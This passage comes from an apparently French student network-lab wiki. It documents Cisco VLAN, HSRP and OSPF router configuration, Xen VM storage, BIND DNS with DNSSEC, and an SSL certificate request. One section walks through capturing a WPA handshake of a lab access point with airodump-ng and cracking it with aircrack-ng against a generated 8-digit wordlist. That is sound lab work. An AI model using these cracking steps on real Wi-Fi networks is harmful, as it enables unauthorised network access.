*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
